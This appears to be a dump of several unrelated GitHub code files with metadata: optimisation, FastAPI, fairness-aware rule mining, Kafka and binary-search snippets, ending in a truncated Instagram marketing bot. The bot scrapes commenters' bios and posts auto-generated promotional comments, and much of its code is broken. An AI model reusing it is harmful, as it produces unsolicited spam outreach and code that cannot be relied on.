range(self.max_iterations):\n\t\t\tprint(self.objective(self.gbest))\n\t\t\tself.__update_positions()\n\t\t\tself.__update_best_positions()\n\n\t\treturn self.gbest\n","repo_name":"LuckysonKhaidem/HyperVolume-Maximization","sub_path":"qpso.py","file_name":"qpso.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2637624536","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport random\nimport os\n\nserver = FastAPI(title='My API')\n\n\n@server.get('/status')\nasync def get_status():\n \"\"\"Returns 1 if the API is up\n \"\"\"\n return {\n 'status': 1\n }\n\n\n@server.get('/environment')\nasync def get_environment():\n \"\"\"\n If the environment variable ENVIRONMENT_TYPE is set, returns it\n \"\"\"\n environment_type = os.environ.get('ENVIRONMENT_TYPE')\n if environment_type:\n return {\n 'environment': environment_type\n }\n else:\n return {\n 'environment': 'unknown'\n }\n\n\nclass Sentence(BaseModel):\n sentence: str = 'hello world'\n language: str = 'en'\n\n\nclass PredictedSentence(Sentence):\n score: float = 0.\n\n\n@server.post('/predict', response_model=PredictedSentence)\nasync def post_sentence(sentence: Sentence):\n \"\"\"Returns the sentiment of the sentence\n \"\"\"\n return PredictedSentence(\n sentence=sentence.sentence,\n language=sentence.language,\n score=random.uniform(0, 1)\n )\n","repo_name":"polymoe/datascientest","sub_path":"Kubernetes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36641965709","text":"# coding: utf-8\n# python 3.5\nimport sys\nimport os\nsys.path.append('/Users/ooki/git/research_dr/python/MLEM2')\nsys.path.append(os.path.dirname(os.path.abspath(\"__file__\"))+'/../MLEM2')\nfrom sklearn.metrics import accuracy_score\nimport copy\nimport importlib\nimport mlem2\nimport LERS\nimportlib.reload(mlem2) \nimportlib.reload(LERS) \nfrom rules_stat import getNumRulesClass\nfrom rules_stat import getRulesValueCount\n \n# =====================================\n# 公正配慮すべき属性list_sをdecision_tableから削除する\n# =====================================\ndef delDiscriminativeAttributes(decision_table, list_s):\n return(decision_table.drop(list_s, axis=1))\n\n# =====================================\n# Rules のうち 属性attr / 基本条件 e(属性attrの値v) を含むルールセットの数を返す\n# =====================================\ndef getNumRulesIncludeAttr(list_rules, attr) :\n rules = [r for r in list_rules if attr in r.getKey()]\n return(len(rules))\n\ndef getNumRulesIncludeE(list_rules, attr, v) :\n rules = [r for r in list_rules if r.getValue(attr) == v]\n return(len(rules))\n\ndef getNumRulesClassIncludeAttr(list_rules, attr, cls) :\n rules = [r for r in list_rules if (attr in r.getKey()) and r.getConsequent() == cls]\n return(len(rules))\n\ndef getNumRulesClassIncludeE(list_rules, attr, v, cls) :\n rules = [r for r in list_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n return(len(rules))\n\ndef getNumRulesIncludeMultipleE(list_rules, dict_attribute_value):\n tmp_rules = list_rules\n for attr in dict_attribute_value.keys():\n for v in dict_attribute_value[attr] : \n tmp_rules = [r for r in tmp_rules if r.getValue(attr) == v]\n return(len(tmp_rules))\n\ndef getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, cls):\n tmp_rules = list_rules\n for attr in dict_attribute_value.keys():\n for v in dict_attribute_value[attr] : \n tmp_rules = [r for r in tmp_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n return(len(tmp_rules))\n\n# ======================================\n# 分割表a, b, c, d を返す\n# ======================================\ndef getContingencyTable(list_rules, dict_attribute_value, CLASSES):\n N = len(list_rules)\n n1 = getNumRulesClass(list_rules, CLASSES[\"bad\"])\n n2 = getNumRulesClass(list_rules, CLASSES[\"good\"])\n a = getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, CLASSES[\"bad\"])\n b = n1 - a\n c = getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, CLASSES[\"good\"])\n d = n2 - c\n return(a,b,c,d) \n \n# =====================================\n# Rules のうち 属性attr / 基本条件 e(属性attrの値v) を含むルールセットを返す\n# ===================================== \ndef getRulesIncludeAttr(list_rules, attr) :\n rules = [r for r in list_rules if attr in r.getKey()]\n return(rules)\n\ndef getRulesIncludeE(list_rules, attr, v) :\n rules = [r for r in list_rules if r.getValue(attr) == v]\n return(rules)\n \n# =====================================\n# Rules のうち 属性attr / 基本条件e を 含まないルールセットを返す\n# ===================================== \ndef getRulesExcludeAttr(list_rules, attr) :\n rules = [r for r in list_rules if not attr in r.getKey()]\n return(rules)\n \ndef getRulesExcludeE(list_rules, attr, v) :\n rules = [r for r in list_rules if r.getValue(attr) != v]\n return(rules)\n\n# =====================================\n# Rules のうち 属性attr / 基本条件e を 削除したルールセットを返す\n# Rule の 属性attr / 基本条件 e を削除したルールを返す\n# =====================================\ndef getRulesDelAttr(list_rules, attr) :\n rules = [delAttrFromRule(r, attr) for r in list_rules]\n return(rules)\n \ndef getRulesDelE(list_rules, attr, v) :\n rules = [delEFromRule(r, attr, v) for r in list_rules]\n return(rules)\n \ndef delAttrFromRule(rule, attr) :\n rule_new = copy.deepcopy(rule)\n rule_new.delKey(attr)\n return(rule_new)\n\ndef delEFromRule(rule, attr, v) :\n if rule.getValue(attr) == v : return(delAttrFromRule(rule, attr))\n else : return(rule)\n \n# =====================================\n# alpha差別的な Rule を含まないルールセットを返す\n# alpha差別的な Rule の 基本条件 e を削除したルールを返す\n# ===================================== \ndef getAlphaRulesExcludeE(list_rules, attr, v, decision_table, list_judgeNominal, alpha = 0) :\n rules = [r for r in list_rules if getElift(r, attr, v, decision_table, list_judgeNominal) <= alpha ]\n return(rules)\n\ndef getAlphaRulesDelE(list_rules, attr, v, decision_table, list_judgeNominal, alpha = 0) :\n rules = [delEFromAlphaRule(r, attr, v, decision_table, list_judgeNominal, alpha = 0) for r in list_rules]\n return(rules)\n \ndef delEFromAlphaRule(rule, attr, v, decision_table, list_judgeNominal, alpha = 0):\n if rule.getValue(attr) == v :\n elift = getElift(rule, attr, v, decision_table, list_judgeNominal)\n if elift > alpha : return(delAttrFromRule(rule, attr))\n else : return(rule)\n else : \n return(rule)\n\n# =====================================\n# M差別的な Rule の を含まない / 基本条件 e を削除したルールセットを返す\n# ===================================== \ndef getMRulesFUN(list_rules, attr, v, target_cls, DELFUN, m = 0) :\n num_target_cls, num_other_cls, list_num_other_cls = 0, 0, []\n classes = mlem2.getEstimatedClass(list_rules)\n for cls in classes :\n if cls == target_cls :\n num_target_cls = getNumRulesClassIncludeE(list_rules, attr, v, cls)\n else :\n list_num_other_cls.append(getNumRulesClassIncludeE(list_rules, attr, v, cls))\n num_other_cls = sum(list_num_other_cls) / len(list_num_other_cls) #複数クラスの場合を考慮\n if (num_target_cls / (num_target_cls + num_other_cls)) > m : #m保護なら\n return(list_rules)\n else :\n return(DELFUN(list_rules, attr, v))\n\n# =====================================\n# 配慮変数sをもつ対象だけの決定表を作る\n# =====================================\ndef createDTSuppoterdbyRule(list_rules, attr, v, cls, decision_table):\n target_indice = []\n target_rules = [r for r in list_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n for rule in target_rules:\n target_indice.extend(rule.getSupport())\n target_indice = list(set(target_indice))\n target_indice = sorted(target_indice)\n new_decision_table = decision_table_train.ix[target_indice]\n new_decision_class = new_decision_table[new_decision_table.columns[-1]].values.tolist()\n return(new_decision_table, new_decision_class)\n\n# 有利な決定クラスのルールを減らす関数 配慮変数sを\n\n\n# =====================================\n# Rule の 配慮変数s での decision_tableにおける elift\n# =====================================\ndef getElift(rule, attr, v, decision_table, list_judgeNominal):\n supp, conf = LERS.getSupportConfidence(rule, decision_table, list_judgeNominal)\n rule_s = delEFromRule(rule, attr, v)\n supp_s, conf_s = LERS.getSupportConfidence(rule_s, decision_table, list_judgeNominal)\n if conf_s == 0: elift = 999\n else : elift = conf / conf_s\n return(elift)\n \n# =====================================\n# Rule の 配慮変数s での decision_tableにおける slift\n# =====================================\ndef getSlift(rule, s, decision_table, operator):\n conditions = mlem2.getConditionValues(decision_table, s)\n clifts = [getClift(rule, s, c, decision_table) for c in conditions]\n slift = operator(clifts)\n return(slift)\n\n# =====================================\n# Rule の 配慮変数s と 代替する変数c での decision_tableにおける clift\n# =====================================\ndef getClift(rule, s, c, decision_table, list_judgeNominal):\n supp, conf = LERS.getSupportConfidence(rule, decision_table,list_judgeNominal)\n rule_c = mlem2.delEfromRule(rule,s)\n rule_c = rule_c.setValue(s,c)\n supp_c, conf_c = LERS.getSupportConfidence(rule_c, decision_table, list_judgeNominal)\n clift = conf / conf_c\n return(clift)\n\n# ====================================\n# Attribute Value dict を stringにして返す\n# ====================================\ndef strAttributeValue(ATTRIBUTE_VALUE) :\n list_string = []\n for i in ATTRIBUTE_VALUE :\n list_string.append(i+\"-\".join(ATTRIBUTE_VALUE[i]))\n return(\"+\".join(list_string))\n\n# ====================================\n# Attribute Value dict を stringにして返す\n# ====================================\ndef getItemSet(rule_value) :\n itemset = set()\n for attr in rule_value :\n itemset.add(attr+\"-\".join(rule_value[attr]))\n return(itemset)\n\ndef jaccard(set1, set2):\n set_and = set1 & set2\n set_or = set1 | set2\n if len(set_or) == 0 :\n return(0)\n else :\n return(len(set_and)/len(set_or))\n\n# ========================================\n# main\n# ========================================\nif __name__ == \"__main__\":\n\n # 設定\n DIR_UCI = '/mnt/data/uci/'\n FILENAME = 'german_credit_categorical' \n iter1 = 1\n iter2 = 1\n \n # rule induction\n rules = mlem2.getRulesByMLEM2(FILENAME, iter1, iter2)\n\n # test data\n filepath = DIR_UCI+FILENAME+'/'+FILENAME+'-test'+str(iter1)+'-'+str(iter2)+'.tsv'\n decision_table_test = mlem2.getDecisionTable(filepath)\n decision_table_test = decision_table_test.dropna()\n decision_class = decision_table_test[decision_table_test.columns[-1]].values.tolist()\n\n # nominal data\n filepath = DIR_UCI+FILENAME+'/'+FILENAME+'.nominal'\n list_nominal = mlem2.getNominalList(filepath)\n list_judgeNominal = mlem2.getJudgeNominal(decision_table_test, list_nominal)\n \n # predict by LERS\n predictions = LERS.predictByLERS(rules, decision_table_test, list_judgeNominal)\n \n # 正答率を求める\n accuracy_score(decision_class, predictions)\n \n # rules の数を求める\n num = len(rules)\n # 平均の長さを求める\n mean_length = mlem2.getMeanLength(rules)\n\n # train data setup\n decision_table_train, decision_class = getData(FILENAME, iter1, iter2, T = \"train\")\n list_judgeNominal = getJudgeNominal(decision_table_train, FILENAME)\n\n # 平均支持度と平均確信度を求める\n mean_support, mean_conf = LERS.getSupportConfidenceRules(rules, decision_table_train, list_judgeNominal)\n # AccとRecallを求める\n acc_recall = LERS.getAccurayRecall(rules, decision_table_train, list_judgeNominal)\n for i,c in enumerate(mlem2.getEstimatedClass(rules)):\n print(str(acc_recall[i][0])+\",\"+str(acc_recall[i][1]))\n \n ###### 公正配慮のテスト \n \n # 基本条件を含むルールセット\n rules_sex_2 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\", \"2.0\")\n rules_sex_4 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\", \"4.0\") \n # 条件を含まないルールセット \n rules_exclude_sex = mlem2.getRulesExcludeAttr(rules, \"Sex_Marital_Status\")\n # 基本条件を含まないルールセット \n rules_exclude_sex_1 = mlem2.getRulesExcludeE(rules, \"Sex_Marital_Status\", \"1.0\")\n # 条件を削除したルールセット\n rules_del_value = mlem2.getRulesDelAttr(rules, \"Value_Savings_Stocks\") \n # 基本条件を削除したルールセット\n rules_del_value_1 = mlem2.getRulesDelE(rules, \"Value_Savings_Stocks\", \"1.0\") \n \n # 条件を1つ削除する例\n rule = mlem2.delAttrFromRule(rules[12],'No_of_dependents')\n rule = mlem2.delAttrFromRule(rules[12],'Concurrent_Credits')\n\n \n \n # ====\n \n # read data\n filepath = '/mnt/data/uci/'+FILENAME+'/'+FILENAME+'-train'+str(iter1)+'-'+str(iter2)+'.tsv'\n decision_table = mlem2.getDecisionTable(filepath)\n decision_table = decision_table.dropna()\n decision_table.index = range(decision_table.shape[0])\n\n # read nominal\n filepath = '/mnt/data/uci/'+'/'+FILENAME+'/'+FILENAME+'.nominal'\n list_nominal = mlem2.getNominalList(filepath)\n \n # ルールを満たすやつ ほとんどないな。。\n match_objects = decision_table.apply(lambda obj: isExplainRule(obj, rules[12], list_judgeNominal), axis=1) \n\n # confidence\n getConfidence(rule, decision_table, list_judgeNominal)\n \n rules_sex_2 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\",\"2.0\")\n\n \n","repo_name":"okiyuki99/research_dr","sub_path":"python/MLEM2/discrimination.py","file_name":"discrimination.py","file_ext":"py","file_size_in_byte":12551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2100299731","text":"import sys ## input , output\nimport statistics ## find middle Value\n\nnum_arr = int(sys.stdin.readline())\n\narr = []\ncount = [0]*8001\n\nsum_all = 0\nmax_num = 0\nmin_num = 0\nFreq = 0\nFreq_num = 0\n\n##set values\nfor i in range(0,num_arr):\n num_check = int(sys.stdin.readline())\n arr.append(num_check)\n \n if num_check < 0 :\n count[(num_check*-1)+4000] += 1 \n else :\n count[num_check] += 1\n \n sum_all = sum_all + arr[i]\n \n if i == 0:\n max_num = arr[0]\n min_num = arr[0]\n else :\n if arr[i]>max_num:\n max_num = arr[i]\n elif arr[i]4000: \n Freq_arr.append((i*-1)+4000)\n \n## Find Frequency number\nFreq_arr.sort()\nlen_Feq = len(Freq_arr)\nif len_Feq == 1:\n Freq_num = Freq_arr[0]\nelse:\n Freq_num = Freq_arr[1] \n\n\n\n##Sorting array and Finding middle of array \narr.sort()\nmid_value =statistics.median(arr)\n\n\n\n##print result\nprint(round(sum_all/num_arr))\nprint(mid_value)\nprint(Freq_num)\nprint(max_num-min_num)\n\n\n\n\n\n","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"BAEKJOON/Sort Algorithm/2108(statistical science).py","file_name":"2108(statistical science).py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72497041794","text":"from aws_xray_sdk.core import xray_recorder\n\n\n@xray_recorder.capture()\ndef get_clients(**kwargs):\n driver = kwargs['driver']\n client_search_data = {\n 'teams': 1,\n 'client_id': 1,\n 'last_name': 1,\n 'first_name': 1,\n 'text28': 1,\n 'dob': 1,\n 'ssn': 1,\n 'primary_assigned': 1,\n 'client_status_f': 'ALL ACTIVE'\n }\n results = driver.process_advanced_search('Clients', client_search_data)\n return {'patients': results, 'id_source': driver.id_source}\n","repo_name":"AlgernonSolutions/incredible_algernon","sub_path":"src/toll_booth/tasks/get_clients.py","file_name":"get_clients.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35862290797","text":"# Example to test connectivity to Kafka\n# Author: Ozzie Farfan\n\nfrom kafka import KafkaProducer\nimport time\n\nmykafkaserver=\"localhost:9092\"\nmytopic=\"ozsample1\"\nmytopic=\"oztest1\"\n\ntry:\n producer = KafkaProducer(bootstrap_servers=mykafkaserver)\n # producer = KafkaProducer(bootstrap_servers='10.230.89.218:9092')\nexcept Exception as e:\n print (\"Error conectandose a Kafka\")\n print (e)\n\n# producer.send('sample', b'Mi Primer Kafka Producer') \n\nmymessage = ['Bienvenido','a Kafka','una aventura','en el manejo','de eventos']\n\nkey=1001\nfor m in mymessage:\n key = key + 1 \n mkey = 'message-'+str(key)\n print (\"sending \",mkey,\" = \",m)\n # message encoded to ensure valid unicode as expected by Kafka\n key_bytes = bytes(mkey, encoding='utf-8')\n value_bytes = bytes(m, encoding='utf-8')\n producer.send(mytopic, key=key_bytes, value=value_bytes)\n producer.flush()\n # delay introduced just for illustration purposes (not needed by Kakfa)\n time.sleep(1)\n\n","repo_name":"ozzie2080/KafkaMogoDbDockerPy","sub_path":"example-producer.py","file_name":"example-producer.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25687710113","text":"def binary_search(l, u, f):\n \"\"\"Binary search f(x) == 0 on ints in range [l, u].\"\"\"\n while l < u:\n m = l + (u - l) / 2\n v = f(m)\n if v == 0:\n return m\n elif v < 0:\n l = m + 1\n else:\n u = m - 1\n return l\n\n\ndef find_kth(A, B, k):\n \"\"\"\n >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 1)\n 1\n >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 2)\n 2\n >>> find_kth([1, 3, 5, 7], [2, 4, 6, 8], 8)\n 8\n >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 8)\n 8\n >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 4)\n 4\n >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 9)\n 9\n >>> find_kth([4, 5, 6, 7, 8, 9], [1, 2, 3], 3)\n 3\n >>> find_kth(range(1, 100, 2), range(2, 100, 2), 1)\n 1\n >>> find_kth(range(1, 100, 2), range(2, 100, 2), 3)\n 3\n >>> find_kth(range(1, 100, 2), range(2, 100, 2), 47)\n 47\n >>> find_kth(range(1, 100, 2), range(2, 100, 2), 93)\n 93\n >>> find_kth([100, 101, 102], range(1, 100), 93)\n 93\n >>> find_kth(range(1, 100), [100, 101, 102], 93)\n 93\n >>> find_kth([1, 2, 3], range(100, 200), 94)\n 190\n >>> find_kth(range(100, 200), [1, 2, 3], 94)\n 190\n \"\"\"\n\n def cmp(i):\n \"\"\"If we grab the first i elements from A and j = k - i from B,\n are these 2 slices compatible to finding our solution?\n\n Returns: -1 if i is too small, +1 if i is too big\n \"\"\"\n j = k - i\n\n # General case.\n if i == 0 or (j > 0 and A[i-1] <= B[j-1]):\n if i == len(A) or B[j-1] <= A[i]:\n return 0\n else:\n return -1\n elif j == 0 or (i > 0 and B[j-1] < A[i-1]):\n if j == len(B) or A[i-1] <= B[j]:\n return 0\n else:\n return +1\n else:\n raise ValueError('Wtf?')\n\n # Compute lower and upper bound for i.\n lower_bound_i = max(0, k - len(B))\n upper_bound_i = min(k, len(A))\n i = binary_search(lower_bound_i, upper_bound_i, cmp)\n j = k - i\n if i == 0:\n return B[j-1]\n elif j == 0:\n return A[i-1]\n else:\n return max(A[i-1], B[j-1])\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"mihneagiurgea/pysandbox","sub_path":"ctci/epi_ch8p8.py","file_name":"epi_ch8p8.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"42496812521","text":"# Import necessary libraries\nfrom flask import Flask, jsonify, request, session, render_template, url_for, redirect\nfrom flask import Flask, session\nfrom flask_session import Session\nimport json\nimport requests\nfrom google.auth import exceptions\nimport gspread\nfrom google.oauth2 import service_account\nfrom google.auth.exceptions import GoogleAuthError\nfrom datetime import datetime, timedelta\nimport random\nimport signal\nimport sys\nfrom dotenv import load_dotenv\nimport openai # Make sure to have OpenAI Python library installed\nimport os\n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 1: Define Tool Functions and Environment Variables\n#------------------------------------------------------------------------------------\ndef initialize_sheet(sheet_number):\n # Load credentials from the JSON file\n try:\n gc = gspread.service_account(filename='/home/ubuntu/aibot_twitter/ai-bot-twitter-08dd107ad8e6.json')\n except exceptions.GoogleAuthError as e:\n print()\n print(f\"Error authenticating: {e}\")\n return None\n\n sheet_name = \"Prospected Usernames and Bot Accounts\"\n\n try:\n sh = gc.open(sheet_name)\n worksheet = sh.get_worksheet(sheet_number) # Use sheet1 or specify the desired sheet\n values = worksheet.get_all_values()\n return values\n\n except (gspread.SpreadsheetNotFound, gspread.WorksheetNotFound, IndexError):\n # If the sheet doesn't exist or if sheet_number is out of range\n print()\n print(f\"Sheet with number {sheet_number} not found or out of range.\")\n return None # Return None or handle the case accordingly\n \ndef get_instagram_data(endpoint, params):\n try:\n base_url = 'https://graph.instagram.com/v12.0/'\n response = requests.get(f'{base_url}{endpoint}', params=params)\n \n # Print the response text for debugging\n print()\n print(\"Getting IG Data..\")\n print()\n \n if response.status_code == 200 and response.text:\n return response.json()\n else:\n print()\n print(\"Failed to get data from Instagram. Status code:\", response.status_code)\n print(\"IG Data Text:\", response.text)\n \n # Print specific headers for more information\n print(\"WWW-Authenticate Header:\", response.headers.get('WWW-Authenticate'))\n print(\"X-FB-Debug Header:\", response.headers.get('X-FB-Debug'))\n print(\"IG-Api-Error-Message Header:\", response.headers.get('IG-Api-Error-Message'))\n \n # Check if the response can be parsed as JSON and contains error_subcode\n try:\n error_json = response.json()\n if 'error_subcode' in error_json:\n error_subcode = error_json['error_subcode']\n print(f\"Error Subcode: {error_subcode}\")\n except json.JSONDecodeError:\n print()\n print(\"Error in decoding json, suberror code cant be found or read.\")\n return None\n except requests.RequestException as e:\n print()\n print(f\"Error making Instagram API request: {e}\")\n print(f\"Response text: {response.text}\")\n return None\n\n# Load environment variables from .env\nload_dotenv()\nglobal zyteAPI, zyte_creds_path\nuser_id = \"test user id\" # Replace with your actual user_id\n# Google sheets variables \ncreds_sheet = initialize_sheet(0)# Use the index of the sheet (0 for code setup, 1 for bot accounts, 2 for posts, 3 for prospects)\n#print(\"DEBUG: creds_sheet:\", creds_sheet)\nbots_sheet_data = initialize_sheet(1) #setup_file.get_worksheet(1).get_all_records()\nposts_sheet_data = initialize_sheet(2)#setup_file.get_worksheet(2).get_all_records()\nprospects_sheet_data = initialize_sheet(3) #setup_file.get_worksheet(3).get_all_records()\nhashtags_sheet_data = initialize_sheet(4)\n\nbot_app_id = bots_sheet_data[1][3]\nbot_secret = bots_sheet_data[1][4]\n\nopenai.api_key = creds_sheet[0][1]\nDIALOGFLOW_KEY_FILE = creds_sheet[1][1]\nzyteAPI = creds_sheet[2][1]\nzyte_creds_path = creds_sheet[3][1]\nos.environ['REQUESTS_CA_BUNDLE'] = '/etc/ssl/certs/ca-certificates.crt'\n\n# Suppress only the InsecureRequestWarning from urllib3 needed for SSL verification\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n#Setup residential proxy with Zenrows API\n#print(f\"Key set: {zrosAPI}\")\n#res_proxy = f\"http://{zrowsAPI}:premium_proxy=true&proxy_country=us@proxy.zenrows.com:8001\"\n#res_proxies = {\"http\": res_proxy, \"https\": res_proxy}\n\n# Initialize DialogFlow client\nscope = ['https://www.googleapis.com/auth/dialogflow']\ntry:\n credentials = service_account.Credentials.from_service_account_file(\n DIALOGFLOW_KEY_FILE, scopes=scope\n )\n client = gspread.authorize(credentials)\nexcept GoogleAuthError as e:\n print(f\"Error initializing Google Sheets client: {e}\")\n\n# Define your Instagram accounts and proxy configurations\nbots = []\nfor row in bots_sheet_data:\n bot = {\n \"username\": row[0],\n \"password\": row[1],\n \"access_token\": \"{}|{}\".format(bot_app_id, bot_secret),\n }\n \n bots.append(bot)\n\n#Debug Auth\nprint()\nprint(f\"Starting Bot.. with credentials /n(Secret: {bot_secret}, ID: {bot_app_id})\")\n\n#Get and return iguser id to get hashtag\ntry:\n params = {'fields': 'id', 'access_token': bots[0].get(\"Access_Token\")}\n response = get_instagram_data('ig_user_id', params) # Replace 'ig_user_id' with the actual endpoint\n\n if response and 'id' in response:\n user_id = response['id']\n bots_sheet_data[1][5] = user_id\n\nexcept Exception as e:\n print()\n print(f\"Error getting Instagram User ID: {e}\")\n\nprint(f\"Running bot as user: {user_id}\")\nprint()\nprint()\nprint(\"Tool functions operational. Initializing application functions..\")\nprint()\n \n\n# Flask app for DialogFlow fulfillment\napp = Flask(__name__)\n\n# Set up a session for storing script and global status\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\n\n# Placeholder variable for uncontacted and contacted usernames\n#uncontacted_usernames = [...] # Replace with actual data\n#contacted_usernames = [...] # Replace with actual data\n\n# Define statistics variables\ntotal_bookings = 0\noutreach_done = 0\nscript_enabled = False\nprospecting_limit = 5\nglobal g_status\ng_status = \"Idle\"\n\n# Initialize a set to temporarily store prospected usernames\nprospected_usernames = set()\nprospecting_failed = False\n\n# Variable to store the conversation context\nconversation_context = []\n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 2: Define functions\n#----------------------------------------------------------------------------------------------------\ndef update_google_sheet(sheet_name, data):\n # Implement logic to update data in Google Sheets\n # Example: Use gspread library to update a sheet\n gc = gspread.service_account(filename='path/to/credentials.json')\n sh = gc.open(sheet_name)\n worksheet = sh.get_worksheet(0) # Assumes data is stored in the first worksheet\n\n # Append the data to the worksheet\n worksheet.append_table([list(data.values())])\n\n# Function to gracefully shutdown Flask server for code updates\ndef signal_handler(sig, frame):\n print('Shutting down gracefully...')\n # Perform cleanup tasks if necessary\n sys.exit(0)\n \n#Function to post comment\ndef post_comment(post_id, context, access_token):\n # Instagram Graph API request to post a comment\n api_url = f\"https://graph.instagram.com/v12.0/{post_id}/comments\"\n \n # Customize the message based on the previous context\n template = {\n 'intro': f\"Hello again! {previous_message} Let's continue our conversation.\",\n 'book_meeting': \"How about scheduling a meeting to discuss this further? It's 15-30 minutes, you can ask me any question, and I can actually answer them! You can pick a time that works for you here: [https://calendly.com/genusglobal/studios].\",\n }\n\n # Combine the template steps into the full message\n full_message = f\"{context} {template[context]}\"\n\n # Format content by defining GPT-3 role when generating comment\n response = openai.Completion.create(\n engine=\"davinci\",\n messages=[{'role': 'system', 'content': 'You are a helpful assistant.'}, {'role': 'user', 'content': full_message}],\n max_tokens=100\n )\n generated_message = response.choices[0].text.strip()\n \n params = {'access_token': access_token, 'message': generated_message}\n response = requests.post(api_url, params=params)#post comment\n\n # Check for successful comment posting\n if response.status_code == 200:\n print(f\"Comment posted successfully on post {post_id}\")\n else:\n print(f\"Error posting comment on post {post_id}. Status code: {response.status_code}\")\n\n#Fetch Hashtag IDs to do search\ndef get_hashtag_id(hashtag):\n #Get and Return Hashtag ID\n try:\n params = {'user_id': user_id, 'q': hashtag}\n response = get_instagram_data('ig_hashtag_search', params)\n\n if response and 'data' in response:\n hashtag_data = response['data']\n if hashtag_data:\n # Assuming the first result contains the desired hashtag ID\n return hashtag_data[0].get('id')\n\n except Exception as e:\n print(f\"Error converting hashtag to ID: {e}\")\n return None\n\n\n#KPI 1 - Get posts\ndef search_posts_by_hashtag(hashtag):\n try:\n # Get hashtag ID\n hashtag_id = get_hashtag_id(hashtag)\n update_global_status(f\"Searching hashtag: {hashtag_id}\")\n\n # Store hashtag ID in Google Sheets\n if hashtag_id:\n hashtags_sheets_data[1][3] = hashtag_id\n\n # Search using the hashtag ID\n params = {'q': hashtag_id, 'access_token': bots[0].get(\"Access_Token\")}\n return get_instagram_data('ig_hashtag_search', params)\n\n except Exception as e:\n print(f\"Error searching posts by hashtag: {e}\")\n return None\n\n#KPI 2 - Get prospects from posts\ndef process_comments(media_id, keyword, access_token):\n global prospect_username # Assuming you have a global variable for the Google Sheet\n\n # Fetch comments for a given media id\n comments_data = get_instagram_data(f'{media_id}/comments', {'access_token': access_token})\n\n # Process comments and update Google Sheets when keyword is found in the user's bio\n for comment in comments_data['data']:\n username = comment['username']\n\n # Fetch user bio using Instagram Graph API\n user_data = get_instagram_data(username, {'fields': 'biography', 'access_token': access_token})\n user_bio = user_data.get('biography', 'Bio not available')\n\n # Check if the keyword is in the user's bio\n if keyword in user_bio.lower():\n prospect_username = username\n # Update prospects sheet using the global variable (replace this with your actual logic)\n update_google_sheet(prospects_sheet_data, username)\n update_global_status(f\"Updating prospects sheet with Username: '{username}', Bio: '{user_bio}'.\")\n \n#KPI 3 - Tier 1 Outreach\ndef generate_comments_and_mark_contacted(username):\n # Implement logic to generate comments and mark as contacted\n global outreach_done\n # Example: Fetch user posts, generate comments, and mark as contacted\n user_posts = get_instagram_data(f'{username}/media', {'access_token': 'your_access_token'})\n \n # Pick three random posts\n selected_posts = random.sample(user_posts, 3)\n post1 = selected_posts[0]\n post2 = selected_posts[1]\n post3 = selected_posts[2]\n \n # Leave a comment on one post\n comment_text = get_instagram_data(f'{post1[id]}/caption', {'access_token': 'your_access_token'})\n post_comment(post1['id'], comment_text, access_token)\n\n # Leave a call-to-action (CTA) on another post\n cta_text = get_instagram_data(f'{post2[id]}/caption', {'access_token': 'your_access_token'})\n post_comment(post2['id'], cta_text, access_token)\n\n # Schedule a comment for the third post\n scheduled_comment = get_instagram_data(f'{post3[id]}/caption', {'access_token': 'your_access_token'})\n post_comment(post3['id'], scheduled_comment, access_token)\n\n #mark as contacted\n outreach_done += 1\n update_global_status(f\"Tier 1 Outreach complete. Current Outreach: {outreach_done}\")\n \n \n#KPI 4 - Tier 2 Outreach\ndef check_and_respond_to_dm_inquiries(bot_account):\n messages = get_instagram_data(f'{bot_account}/messages', {'access_token': 'your_access_token'})\n for message in messages['data']:\n # Example: Use DialogFlow to check for inquiries and respond accordingly\n #Dialogflow implementation\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef follow_up_with_usernames(uncontacted_usernames, contacted_usernames):\n for username in uncontacted_usernames:\n user_posts = get_instagram_data(f'{username}/media', {'access_token': 'your_access_token'})\n # Example: Generate comments and schedule follow-ups\n\ndef post_ad_posts_with_tensorflow():\n # Implement logic to post ad posts with TensorFlow model\n # Example: Use TensorFlow model to generate ad posts and post them\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef generate_and_post_story():\n # Implement logic to generate and post a story\n # Example: Use Instagram Graph API to post a story\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\ndef schedule_posts(posts_type, schedule_date):\n # Implement logic to schedule posts\n # Example: Schedule 